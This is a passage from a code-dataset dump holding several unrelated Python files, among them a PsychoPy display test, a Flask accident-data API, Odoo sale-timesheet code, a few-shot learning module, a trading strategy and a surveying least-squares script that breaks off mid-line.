schedule_qbo_objects_status_sync(sync_qbo_to_fyle_payments=general_settings.sync_qbo_to_fyle_payments, workspace_id=workspace_id)\n\n schedule_reimbursements_sync(sync_qbo_to_fyle_payments=general_settings.sync_qbo_to_fyle_payments, workspace_id=workspace_id)\n\n return general_settings\n\n\ndef delete_cards_mapping_settings(workspace_general_settings: WorkspaceGeneralSettings):\n if not workspace_general_settings.map_fyle_cards_qbo_account or not workspace_general_settings.corporate_credit_card_expenses_object:\n mapping_setting = MappingSetting.objects.filter(workspace_id=workspace_general_settings.workspace_id, source_field='CORPORATE_CARD', destination_field='CREDIT_CARD_ACCOUNT').first()\n if mapping_setting:\n mapping_setting.delete()\n","repo_name":"fylein/fyle-qbo-api","sub_path":"apps/workspaces/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21741754821","text":"import socket\nimport time\nimport os\n\n\ndef check_port_status(host,port):\n sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sk.settimeout(3)\n try:\n sk.connect((host, port))\n return \"open\"\n except Exception:\n return \"close\"\n sk.close()\n\n\nif __name__ == '__main__':\n\n services = [\n ('192.168.7.11', 9000, 'jumpserver'),\n ]\n msg = []\n connection = False\n while not connection:\n for s in services:\n result = check_port_status(s[0],s[1])\n print(\"%s : %s \" %(s[2],result))\n if result == \"open\":\n connection = True\n else:\n time.sleep(60)\n os.system('190204084208765161.mp4')\n","repo_name":"vanvank/lotus-ops","sub_path":"monitor/wait_port_to_be_open.py","file_name":"wait_port_to_be_open.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"22495734990","text":"import numpy as np\nimport psychopy.event\nimport psychopy.visual\n\n\n\n'''\n[09/06/2022 08:05] Simon Rushton\nIf you have a few mins you could write a quick psychopy program for me,\nusing pyglet, that draws 1024 stripes next to each other.\nFor a first band of stripes the luminance should be -1+2*(i/1023) where i is 0->1023 and\nnext to that we want a stripes that are -1+2*((i%4)/1023).\nThat should give us two grey-scale gradients to compare, one that should be 10bit and\none that should be 8bit. That provides a very easy way of checking we are really getting 10bit -\nthe 10bit stripe should be a lot smoother than the 8 bit stripe.\n\nadapted from script for Ponzo illusion at \nhttps://www.djmannion.net/psych_programming/vision/draw_shapes/draw_shapes.html\n\n'''\n\n\n# get 1024 (10-bit) values between -1 and 1.\nlist_10_bit = [-1+2*(i/1023) for i in list(range(1024))]\n\n# get 256 (8-bit) values between -1 and 1, each repeated*4 to give 1024 items\n# list_8_bit = [-1+2*(i/256) for i in list(range(256))]\n# list_8_bit = np.repeat(list_8_bit, 4)\nlist_8_bit = [-1+2*((i//4)*4)/1023 for i in list(range(1024))]\n\n\n# print lists of equivalent values from 10-bit and 8-bit lists\n# for idx, (a_10, b_8) in enumerate(zip(list_10_bit, list_8_bit)):\n# print(f\"{idx}: 10-bit: {a_10}, 8-bit: {b_8}\")\n\n\n# # If you want to display on external monitor, set this variable to True\nexternal_monitor=False\n\nuse_screen = 0\nif external_monitor:\n use_screen = 1\n\n# initialize pyglet window\nwin = psychopy.visual.Window(size=[1024, 1024], units=\"pix\", fullscr=True,\n color=[1, 1, 1], winType='pyglet', bpc=[10, 10, 10],\n screen=use_screen)\n\n# define line stimuli\nline = psychopy.visual.Line(win=win, units=\"pix\")\n\n# horizontal positions for lines [-512 to 512]\nx_pos = [i-512 for i in list(range(1024))]\n\n# draw 10-bit lines at top of screen\nfor idx, bar_offset in enumerate(x_pos):\n\n line.start = [bar_offset, 500]\n line.end = [bar_offset, 0]\n\n line.lineColor = [list_10_bit[idx], list_10_bit[idx], list_10_bit[idx]]\n\n line.draw()\n\n# draw 8-bit lines at bottom of screen\nfor idx, bar_offset in enumerate(x_pos):\n\n line.start = [bar_offset, 0]\n line.end = [bar_offset, -500]\n\n line.lineColor = [list_8_bit[idx], list_8_bit[idx], list_8_bit[idx]]\n\n line.draw()\n\n\nwin.flip()\n\nwin.getMovieFrame()\npsychopy.event.waitKeys()\n\nwin.close()\n","repo_name":"Nickdotmartin/Cardiff","sub_path":"Nick_scripts/10_bit_test.py","file_name":"10_bit_test.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70922756091","text":"import bisect\n\nwith open('ordering.in') as f:\n for _ in range(int(f.readline())):\n line = list(map(int, f.readline().split()))\n K, arr = line[0], line[1:]\n order = []\n step_back = 0\n while len(arr) > 0:\n student = arr.pop(0)\n idx = bisect.bisect(order, student)\n step_back += len(order) - idx\n order.insert(idx, student)\n print(f'{K} {step_back}')\n f.close()\n","repo_name":"jowilf/MapcomTrainings-RYJ-","sub_path":"mapcom_test/ordering.py","file_name":"ordering.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"18264728142","text":"from .constants import BOARD_TEMPLATE\n\nclass Result:\n def __init__(self, status, index, x, y):\n self.status = status\n self.index = index\n self.x = x\n self.y = y\n\n @property\n def move(self):\n return (self.index, self.x, self.y)\n\n def __repr__(self):\n return \"Result({}, {}, {}, {})\".format(self.status, self.index, self.x, self.y)\n\n def __str__(self):\n ans = (\"Current Monoid: {}\\n\"\n \"Winning Position? {}\\n\"\n \"Last move was at the {} board\\n\").format(self.status, self.status.is_win(), self.index)\n stones = [' '] * 9\n stones[self.x * 3 + self.y] = 'X'\n ans += BOARD_TEMPLATE.format(*stones)\n return ans\n","repo_name":"oalieno/Notakto","sub_path":"Notakto/Result.py","file_name":"Result.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"19428126173","text":"\ndef select_batch(dataset, size, **kwds):\n from torch.utils.data import DataLoader\n for x in DataLoader(dataset, batch_size=size, shuffle=True, **kwds):\n return x\n\n\ndef prototype_fn(x):\n from torch import mean\n return mean(x, dim=0, keepdims=True)\n\n\ndef pairdist_fn(x, y):\n from torch import cdist\n x = x.unsqueeze(0)\n y = y.unsqueeze(0)\n return cdist(x, y, p=2).squeeze(0)\n\n\ndef dist_fn(x, y):\n from torch.nn.functional import pairwise_distance\n return pairwise_distance(x, y, p=2)\n\n\ndef episode(*datasets, features_fn, n_support=5, n_query=100, lambda_dist=0.4, lambda_class=1):\n from torch import cat, tensor\n from torch.nn.functional import cross_entropy\n\n prototypes = []\n for dataset in datasets:\n support = select_batch(dataset, n_support)\n support = features_fn(support)\n prototype = prototype_fn(support)\n assert prototype.size(0) == 1\n prototypes.append(prototype)\n prototypes = cat(prototypes, dim=0)\n\n total_loss = 0\n for i, dataset in enumerate(datasets):\n queries = select_batch(dataset, n_query)\n queries = features_fn(queries)\n\n prototype = prototypes[i].unsqueeze(0)\n temp = [1] * (queries.dim() - 1)\n prototype = prototype.repeat(queries.size(0), *temp)\n\n distances = dist_fn(queries, prototype)\n distance_loss = distances.mean()\n del distances\n\n scores = -pairdist_fn(queries, prototypes)\n labels = tensor([i] * scores.size(0)).to(scores.device)\n class_loss = cross_entropy(scores, labels)\n del scores, labels\n\n loss = lambda_dist * distance_loss + lambda_class * class_loss\n total_loss += loss\n\n return total_loss\n\n\ndef accuracy(*datasets, features_fn, n_support=5, n_query=100):\n from torch import cat, tensor, argmax, softmax\n\n prototypes = []\n for dataset in datasets:\n support = select_batch(dataset, n_support)\n support = features_fn(support)\n prototype = prototype_fn(support)\n assert prototype.size(0) == 1\n prototypes.append(prototype)\n prototypes = cat(prototypes, dim=0)\n\n total_correct = 0\n total_queries = 0\n for i, dataset in enumerate(datasets):\n queries = select_batch(dataset, n_query)\n queries = features_fn(queries)\n\n prototype = prototypes[i].unsqueeze(0)\n temp = [1] * (queries.dim() - 1)\n prototype = prototype.repeat(queries.size(0), *temp)\n\n scores = -pairdist_fn(queries, prototypes)\n preds = argmax(scores, dim=1)\n labels = tensor([i] * scores.size(0)).to(scores.device)\n\n correct = (preds == labels).sum()\n total_correct += correct.item()\n total_queries += queries.size(0)\n\n return total_correct / total_queries\n","repo_name":"josmople/pckt_fewshot","sub_path":"fewshot.py","file_name":"fewshot.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"41706652504","text":"import json\nimport requests\nimport os\nimport time\nimport sqlite3\n\n# метод получения страниц с необходимым нам фильтром\ndef getPage(page = 0):\n params = dict(text='1C',area=44,only_with_salary='true', page = page, per_page = 10)\n req = requests.get('https://api.hh.ru/vacancies', params)\n data = req.content.decode(encoding='UTF8')\n req.close()\n return data\n\n#в цикле получаем страницы и записываем их в файлы, в папку для страниц\nfor page in range(0, 20):\n jsObj = json.loads(getPage(page))\n nextFileName = './docs/pagination/{}.json'.format(len(os.listdir(('./docs/pagination'))))\n f = open(nextFileName, mode='w', encoding='utf8')\n f.write(json.dumps(jsObj, ensure_ascii=False))\n f.close()\n\n if(jsObj['pages'] - page) <= 1:\n break\n\n time.sleep(0.25)\n","repo_name":"Wurberry/Telebot_hhru","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29340671437","text":"from flask import Flask, render_template, jsonify, send_from_directory, request\nimport json\nimport pandas as pd\nimport numpy as np\nimport sqlite3 as sql\n\n#init app and class\napp = Flask(__name__)\n\n#initiate memory cache of database\nconn = sql.connect('data/amusement_accidents.db')\nquery = 'SELECT * FROM accidents'\ndf = pd.read_sql(query, conn)\nconn.close()\n\n# Route to render index.html template\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/getData\", methods=[\"GET\"])\ndef getData():\n accident_dict = df.to_dict(orient='index')\n accidents = jsonify(accident_dict)\n return accidents\n####################################\n# ADD MORE ENDPOINTS\n###########################################\n#app route for bar chart\n@app.route(\"/bar\", methods=[\"GET\"])\ndef barChart():\n moddedDF = df[[\"age_youngest\",\"num_injured\",\"gender\",\"year\"]]\n boxchartdf = moddedDF.groupby(['gender']).num_injured.sum().reset_index()\n boxData = []\n for index, row in boxchartdf.iterrows():\n box_plot = {'gender': row['gender'],\n 'numInjured': row['num_injured']}\n boxData.append(box_plot)\n return jsonify(boxData)\n#app route for scatterplot\n@app.route(\"/scatter\", methods=[\"GET\"])\ndef scatterPlot():\n moddedDF = df[[\"age_youngest\",\"num_injured\",\"gender\",\"year\"]]\n agegroup = moddedDF[[\"age_youngest\",\"num_injured\",\"gender\",\"year\"]]\n bins= [0,1,11,21,31,41,51,61,200]\n labels = ['0','01-10','11-20','21-30','31-40','41-50','51-60','60+']\n agegroup['AgeGroup'] = pd.cut(agegroup['age_youngest'], bins=bins, labels=labels, right=False)\n scatterdf = agegroup.groupby('age_youngest').num_injured.sum().reset_index()\n scatterData = []\n for index, row in scatterdf.iterrows():\n scatter_plot = {'age_youngest': row['age_youngest'],\n 'numInjured': row['num_injured']}\n scatterData.append(scatter_plot)\n return jsonify(scatterData)\n#app route for piechart\n@app.route(\"/pie\", methods=[\"GET\"])\ndef pieChart():\n device_category_pie = df[\"device_category\"].value_counts()\n acc_by_device = []\n for device, acc in device_category_pie.items():\n device_sum = {'device': device,\n 'numAccs': acc}\n acc_by_device.append(device_sum)\n return jsonify(pieData)\n#app route for map\n@app.route('/USmap', methods=['GET'])\ndef buildMap():\n accidents_by_state = df.groupby('acc_state').size()\n acc_by_state = []\n for state, acc in accidents_by_state.items():\n state_sum = {'id': f'US.{state}',\n 'value': acc}\n acc_by_state.append(state_sum)\n return jsonify(acc_by_state)\n\n\n#app route for table\n@app.route('/table', methods=['GET'])\ndef buildTable():\n accident_dict = df.to_dict(orient='index')\n accidents = []\n for key, value in accident_dict.items():\n accidents.append(value)\n return jsonify(accidents)\n\n#############################################################\n@app.after_request\ndef add_header(r):\n \"\"\"\n Add headers to both force latest IE rendering engine or Chrome Frame,\n and also to cache the rendered page for 10 minutes.\n \"\"\"\n r.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'\n r.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate, public, max-age=0\"\n r.headers[\"Pragma\"] = \"no-cache\"\n r.headers[\"Expires\"] = \"0\"\n return r\n\n#main\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"zarzarbinks0702/Theme-Park-Accident-Analysis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3072872548","text":"class PhotoAlbum:\n MAX_PHOTO_COUNT = 4\n\n def __init__(self, pages):\n self.pages = pages\n self.photos = [[] for page in range(pages)]\n self.capacity = len(self.photos) * self.MAX_PHOTO_COUNT\n\n @staticmethod\n def has_avail_spots(photos, capacity):\n photos_count = sum(len(page) for page in photos)\n return photos_count < capacity\n\n @staticmethod\n def page_repr(page):\n dash_separator = \"-----------\"\n return f\"{dash_separator}\\n{' '.join('[]' for photo in page)}\\n\"\n\n @classmethod\n def from_photos_count(cls, photos_count):\n pages = photos_count // 4\n return cls(pages)\n\n def add_photo_to_available_spot(self, label):\n for i in range(len(self.photos)):\n page_index = i + 1\n page = self.photos[i]\n if len(page) < self.MAX_PHOTO_COUNT:\n page.append(label)\n photo_index = page.index(label) + 1\n return f\"{label} photo added successfully on page {page_index} slot {photo_index}\"\n\n def add_photo(self, label):\n if not self.has_avail_spots(self.photos, self.capacity):\n return \"No more free spots\"\n\n return self.add_photo_to_available_spot(label)\n\n def display(self):\n return \"\".join(self.page_repr(page) for page in self.photos) + \"-----------\\n\"\n\n\n# Test Code\nalbum = PhotoAlbum(2)\nalbum2 = PhotoAlbum.from_photos_count(16)\nprint(album2.pages)\n\nprint(album.add_photo(\"baby\"))\nprint(album.add_photo(\"first grade\"))\nprint(album.add_photo(\"eight grade\"))\nprint(album.add_photo(\"party with friends\"))\nprint(album.photos)\nprint(album.add_photo(\"prom\"))\nprint(album.add_photo(\"wedding\"))\nprint(album.display())","repo_name":"geodimitrov/Python-OOP-SoftUni","sub_path":"Attributes-Methods/Exercises/01. photo_album.py","file_name":"01. photo_album.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"16610929702","text":"# multiple linear regression\r\n# data preprocessing\r\n\r\n# import the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# load the data set\r\nimport os\r\n\r\ndataFile = os.path.normpath(\"C:/Users/n846490/Documents/Python Scripts/Multiple_Linear_Regression/50_Startups.csv\")\r\ndataset = pd.read_csv(dataFile)\r\n\r\n# get the X values\r\nX = dataset.iloc[:,0:4].values\r\nX\r\n\r\n# create the y value\r\ny = dataset.iloc[:,-1].values\r\ny\r\n\r\n# start with making them np.arrays\r\n\"\"\"\r\nX = np.array(dataset.iloc[:,0].values)\r\ny = np.array(dataset.iloc[:,1].values)\"\"\"\r\n\r\n# encoding categorical data\r\n# encoding tends to follow alphabetical order\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_X = LabelEncoder()\r\nX[:,3] = labelencoder_X.fit_transform(X[:,3])\r\nonehotencoder = OneHotEncoder(categorical_features = [3])\r\nX= onehotencoder.fit_transform(X).toarray()\r\n\r\n# avoiding the dummy variable trap\r\nX = X[:,1:]\r\n\r\n\r\n# split the data to training and testing\r\nfrom sklearn.cross_validation import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size = 0.2, random_state = 0)\r\n\r\n# feature scaling not always used\r\n\"\"\"from sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nX_train = sc_X.fit_transform(X_train)\r\nX_test = sc_X.transform(X_test)\"\"\"\r\n\r\n# Fitting the multiple linear regression to the training set\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(X_train, y_train)\r\n\r\n# predict the results\r\ny_pred = regressor.predict(X_test)\r\n\r\n# visualizing the test set results\r\nplt.scatter(y_pred, y_test, color = 'red')\r\nplt.title('Startup Profits (Test Set)')\r\nplt.xlabel('Predicted')\r\nplt.ylabel('Actual')\r\nplt.show()\r\n\r\n# building the optimal model using backward elimination\r\n# stats models does not include constant, need to create a 1 coefficent\r\n# need to append the X to the matrix to get the order correct\r\nimport statsmodels.formula.api as sm\r\nX = np.append(arr = np.ones((50,1)).astype(int), values = X, axis = 1)\r\n\r\n# start with the original matrix ad select the significance level\r\nX_opt = X[:, [0, 1, 2, 3, 4, 5]]\r\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\r\nregressor_OLS.summary()\r\n\r\n# based on output remove index 2\r\nX_opt = X[:, [0, 1, 3, 4, 5]]\r\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\r\nregressor_OLS.summary()\r\n\r\nX_opt = X[:, [0, 3]]\r\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\r\nregressor_OLS.summary()\r\n\r\n\r\n\r\n","repo_name":"bgbutler/PythonScripts","sub_path":"MachineLearning/MultipleLinearRegression.py","file_name":"MultipleLinearRegression.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72032722496","text":"#coding=utf-8\nfrom flask import Flask, jsonify, Blueprint, make_response, request, session, render_template\nfrom flask.ext.restful import reqparse, abort, Api, Resource\nfrom mongoengine import *\n\nfrom core.baseAPI import *\nfrom ucenter.provider.userProvider import UserProvider\nfrom ucenter.config import *\nfrom ucenter.web.userWeb import user_web\n\napp = Flask(CONST_SERVER_NAME)\n\nparser = reqparse.RequestParser()\nparser.add_argument('name', type=str)\nparser.add_argument('password', type=str)\nparser.add_argument('mobile', type=str)\nparser.add_argument('email', type=str)\n\nuserProvider = UserProvider()\n \nhome_web = Blueprint('home_web', __name__)\n\n@home_web.route('/', methods = ['GET'])\n@home_web.route('/index', methods = ['GET'])\n@login_required_web\ndef index():\n return render_template('index.html')\n\n@home_web.route('/welcome', methods = ['GET'])\ndef welcome():\n return render_template('welcome.html')\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"cdtschange/PythonKit","sub_path":"ucenter/web/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"8382007266","text":"from odoo import api, fields, models, _\n\nfrom odoo.exceptions import ValidationError\n\n\nclass SaleOrder(models.Model):\n _inherit = 'sale.order'\n\n timesheet_ids = fields.Many2many('account.analytic.line', compute='_compute_timesheet_ids', string='Timesheet activities associated to this sale')\n timesheet_count = fields.Float(string='Timesheet activities', compute='_compute_timesheet_ids')\n\n tasks_ids = fields.Many2many('project.task', compute='_compute_tasks_ids', string='Tasks associated to this sale')\n tasks_count = fields.Integer(string='Tasks', compute='_compute_tasks_ids')\n\n project_project_id = fields.Many2one('project.project', compute='_compute_project_project_id', string='Project associated to this sale')\n\n @api.multi\n @api.depends('project_id.line_ids')\n def _compute_timesheet_ids(self):\n for order in self:\n if order.project_id:\n order.timesheet_ids = self.env['account.analytic.line'].search(\n [('so_line', 'in', order.order_line.ids),\n ('amount', '<=', 0.0),\n ('project_id', '!=', False)])\n else:\n order.timesheet_ids = []\n order.timesheet_count = len(order.timesheet_ids)\n\n @api.multi\n @api.depends('order_line.product_id.project_id')\n def _compute_tasks_ids(self):\n for order in self:\n order.tasks_ids = self.env['project.task'].search([('sale_line_id', 'in', order.order_line.ids)])\n order.tasks_count = len(order.tasks_ids)\n\n @api.multi\n @api.depends('project_id.project_ids')\n def _compute_project_project_id(self):\n for order in self:\n order.project_project_id = self.env['project.project'].search([('analytic_account_id', '=', order.project_id.id)])\n\n @api.multi\n @api.constrains('order_line')\n def _check_multi_timesheet(self):\n for order in self:\n count = 0\n for line in order.order_line:\n if line.product_id.track_service == 'timesheet':\n count += 1\n if count > 1:\n raise ValidationError(_(\"You can use only one product on timesheet within the same sale order. You should split your order to include only one contract based on time and material.\"))\n return {}\n\n @api.multi\n def action_confirm(self):\n result = super(SaleOrder, self).action_confirm()\n for order in self:\n if not order.project_project_id:\n for line in order.order_line:\n if line.product_id.track_service == 'timesheet':\n if not order.project_id:\n order._create_analytic_account(prefix=line.product_id.default_code or None)\n order.project_id.project_create({'name': order.project_id.name, 'use_tasks': True})\n break\n return result\n\n @api.multi\n def action_view_task(self):\n self.ensure_one()\n action = self.env.ref('project.action_view_task')\n list_view_id = self.env.ref('project.view_task_tree2').id\n form_view_id = self.env.ref('project.view_task_form2').id\n\n result = {\n 'name': action.name,\n 'help': action.help,\n 'type': action.type,\n 'views': [[False, 'kanban'], [list_view_id, 'tree'], [form_view_id, 'form'], [False, 'graph'], [False, 'calendar'], [False, 'pivot'], [False, 'graph']],\n 'target': action.target,\n 'context': \"{'group_by':'stage_id'}\",\n 'res_model': action.res_model,\n }\n if len(self.tasks_ids) > 1:\n result['domain'] = \"[('id','in',%s)]\" % self.tasks_ids.ids\n elif len(self.tasks_ids) == 1:\n result['views'] = [(form_view_id, 'form')]\n result['res_id'] = self.tasks_ids.id\n else:\n result = {'type': 'ir.actions.act_window_close'}\n return result\n\n @api.multi\n def action_view_project_project(self):\n self.ensure_one()\n action = self.env.ref('project.open_view_project_all').read()[0]\n form_view_id = self.env.ref('project.edit_project').id\n\n action['views'] = [(form_view_id, 'form')]\n action['res_id'] = self.project_project_id.id\n action.pop('target', None)\n\n return action\n\n @api.multi\n def action_view_timesheet(self):\n self.ensure_one()\n action = self.env.ref('hr_timesheet.act_hr_timesheet_line')\n list_view_id = self.env.ref('hr_timesheet.hr_timesheet_line_tree').id\n form_view_id = self.env.ref('hr_timesheet.hr_timesheet_line_form').id\n\n result = {\n 'name': action.name,\n 'help': action.help,\n 'type': action.type,\n 'views': [[list_view_id, 'tree'], [form_view_id, 'form']],\n 'target': action.target,\n 'context': action.context,\n 'res_model': action.res_model,\n }\n if self.timesheet_count > 0:\n result['domain'] = \"[('id','in',%s)]\" % self.timesheet_ids.ids\n else:\n result = {'type': 'ir.actions.act_window_close'}\n return result\n\n\nclass SaleOrderLine(models.Model):\n _inherit = \"sale.order.line\"\n\n @api.model\n def create(self, values):\n line = super(SaleOrderLine, self).create(values)\n if line.state == 'sale' and not line.order_id.project_id and line.product_id.track_service in ['timesheet', 'task']:\n line.order_id._create_analytic_account()\n return line\n\n @api.multi\n def _compute_analytic(self, domain=None):\n if not domain and self.ids:\n # To filter on analyic lines linked to an expense\n expense_type_id = self.env.ref('account.data_account_type_expenses', raise_if_not_found=False)\n expense_type_id = expense_type_id and expense_type_id.id\n domain = [('so_line', 'in', self.ids), '|', ('amount', '<=', 0.0), ('project_id', '!=', False)]\n return super(SaleOrderLine, self)._compute_analytic(domain=domain)\n","repo_name":"guohuadeng/odoo10-x64","sub_path":"source/odoo/addons/sale_timesheet/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"34670344228","text":"import talib\nimport numpy as np\n\n# 全局变量定义\nM = 5\nN = 5\nMaxPositionNum = 3 # 最大开仓数\nStopPoint = 30 # 止损点\nWinPoint = 100 # 止赢点\nFloatStopStart = 50 # 浮动止损开始点\nFloatStopPoint = 20 # 浮动止损点\n\nHHV = np.array([])\nLLV = np.array([])\n\nContractId = 'SHFE|F|CU|1908'\n\ndef initialize(context): \n global ContractId\n SetBarInterval(ContractId, 'M', 1, 500)\n\ndef handle_data(context):\n global ContractId\n\n # 最少获取10根数据\n bars = HisBarsInfo()\n barLen = len(bars)\n if barLen < 10:\n return\n\n close = bars[-1][\"LastPrice\"]\n pclose = bars[-2][\"LastPrice\"]\n high = bars[-1][\"HighPrice\"]\n phigh = bars[-2][\"HighPrice\"]\n low = bars[-1][\"LowPrice\"]\n plow = bars[-2][\"LowPrice\"]\n\n # 求M周期最高\n HHV = Highest(High().tolist(), M)\n # 求N周期最低\n LLV = Lowest(Low().tolist(), N)\n\n PlotNumeric(\"LAST_HHV\", HHV[-2], RGB_Red())\n PlotNumeric(\"LAST_LLV\", LLV[-2], RGB_Green())\n\n if high > HHV[-2]:\n if (CurrentContracts() < MaxPositionNum) or (MarketPosition() < 0):\n Buy(1, high)\n elif low < LLV[-2]:\n if (abs(CurrentContracts()) < MaxPositionNum) or (MarketPosition() > 0):\n SellShort(1, low)\n \n # 止损\n SetStopPoint(StopPoint)\n # 止赢\n SetWinPoint(WinPoint)\n # 浮动止损, 暂不支持\n #SetFloatStopPoint(FloatStopStart, FloatStopPoint)\n\n\n\n","repo_name":"XiaoCoco/learn_pyqt5","sub_path":"strategy/示例策略/唐氏通道交易系统.py","file_name":"唐氏通道交易系统.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38612332006","text":"class Solution:\n def dominantIndex(self, nums: List[int]) -> int:\n \n if len(nums) == 0:\n return -1\n \n biggest = 0\n \n for i in range(1, len(nums)):\n if nums[i] > nums[biggest]:\n biggest = i\n \n second_biggest = (biggest + 1) % len(nums)\n \n for i in range(len(nums)):\n if i != biggest and nums[i] > nums[second_biggest]:\n second_biggest = i \n \n if nums[biggest] >= nums[second_biggest] * 2:\n return biggest\n else:\n return -1\n \n","repo_name":"yanvoi/leetcode_solutions","sub_path":"Easy/747LargestNumberAtLeastTwiceOfOthers.py","file_name":"747LargestNumberAtLeastTwiceOfOthers.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"72814653374","text":"import math\nimport numpy\nfrom observations import Observation\nfrom coordinates import Coordinate\nfrom utils import get_coordiante_by_name, get_set_up_points, ddeg_to_rad, get_distance\nfrom utils import get_direction, fprint\n\nnumpy.set_printoptions(linewidth=300, suppress=True)\n\ndef read_coordinates_file(path='coordinates.txt'):\n\tcoordinates = []\n\twith open(path) as f:\n\t content = f.readlines()\n\t for line in content:\n\t \tline = line.replace('\\n', '')\n\t \tif len(line.split('\t')) == 4:\n\t \t\tname = line.split('\t')[0]\n\t \t\ty = float(line.split('\t')[1].replace('+', ''))\n\t \t\tx = float(line.split('\t')[2].replace('+', ''))\n\t \t\ttype_ = line.split('\t')[3]\n\t\t \tcoordinates.append(Coordinate(\n\t\t \t\tline_from_file=line,\n\t\t \t\tname = name,\n\t\t \t\ty = y,\n\t\t \t\tx = x,\n\t\t \t\ttype_ = type_,\n\t \t\t))\t\n\treturn coordinates\n\ndef read_observations_file(path='observations.txt'):\n\tcoordinates = read_coordinates_file()\n\tobservations = []\n\twith open(path) as f:\n\t\tcontent = f.readlines()\n\t\tfor line in content:\n\t\t\tline = line.replace('\\n', '')\n\t\t\tif len(line.split('\t')) == 4:\n\t\t\t\tfrom_point = get_coordiante_by_name(line.split('\t')[0], coordinates)\n\t\t\t\tto_point = get_coordiante_by_name(line.split('\t')[1], coordinates)\n\t\t\t\ttype_ = line.split('\t')[2]\n\t\t\t\tif type_ == 'direction':\n\t\t\t\t\tvalue = ddeg_to_rad(line.split('\t')[3].split(' '))\n\t\t\t\telif type_ == 'distance':\n\t\t\t\t\tvalue = float(line.split('\t')[3])\n\t\t\t\telse:\n\t\t\t\t\traise Exception('Dont the type of obseravtion')\n\t\t\t\tobservations.append(Observation(\n\t\t\t\t\tline_from_file=line,\n\t\t\t\t\tfrom_point = from_point,\n\t\t\t\t\tto_point = to_point,\n\t\t\t\t\ttype_ = type_,\n\t\t\t\t\tvalue = value,\n\t\t\t\t))\n\treturn observations\n\nobservations = read_observations_file()\nset_up_points = get_set_up_points(observations)\nnumber_of_set_ups = len(set_up_points)\n\n\nA = numpy.matrix([\n\t\t[0, 0] + [0] * number_of_set_ups,\n ])\nA = numpy.delete(A, (0), axis=0)\n\nl = numpy.matrix([\n\t\t[0],\n ])\nl = numpy.delete(l, (0), axis=0)\n\nP = numpy.matrix([\n\t\t[0] * len(observations),\n ])\nP = numpy.delete(P, (0), axis=0)\n\ni = 0\nfor observation in observations:\n P = numpy.vstack([P, [0] * len(observations)])\n if observation.type_ == 'direction': \n P.itemset((i, i), 1)\n if observation.type_ == 'distance': \n P.itemset((i, i), 15625 * 4)\n i = i + 1\n\nobservation_number = 1\nn = 0\nfor set_up_point_name in set_up_points:\n for observation in observations:\n if observation.from_point.name == set_up_point_name:\n row = [0, 0] + [0] * number_of_set_ups\n observed = None\n calculated = None\n if observation.type_ == 'direction':\n observed = observation.value\n calculated = get_direction(observation.from_point, observation.to_point)\n if observation.to_point.type_ == 'provisional':\n d = get_distance(observation.to_point, observation.from_point)\n y = 206264.8 * (observation.to_point.x - observation.from_point.x) / d**2\n x = -206264.8 * (observation.to_point.y - observation.from_point.y) / d**2\n row[0], row[1] = y, x\n row[1 + observation_number] = -1\n A = numpy.vstack([A, row])\n if observation.to_point.type_ == 'fixed':\n n = n + 1\n row[1 + observation_number] = -1\n A = numpy.vstack([A, row])\n oc = (math.degrees(observed-calculated)*3600)\n l = numpy.vstack([l, oc])\n\t\t\t\t\n observation_number = observation_number + 1\n\nfor observation in observations:\n row = [0, 0] + [0] * number_of_set_ups\n if observation.type_ == 'distance':\n distance = observation.value\n y = -(observation.to_point.y - observation.from_point.y) / distance\n x = -(observation.to_point.x - observation.from_point.x) / 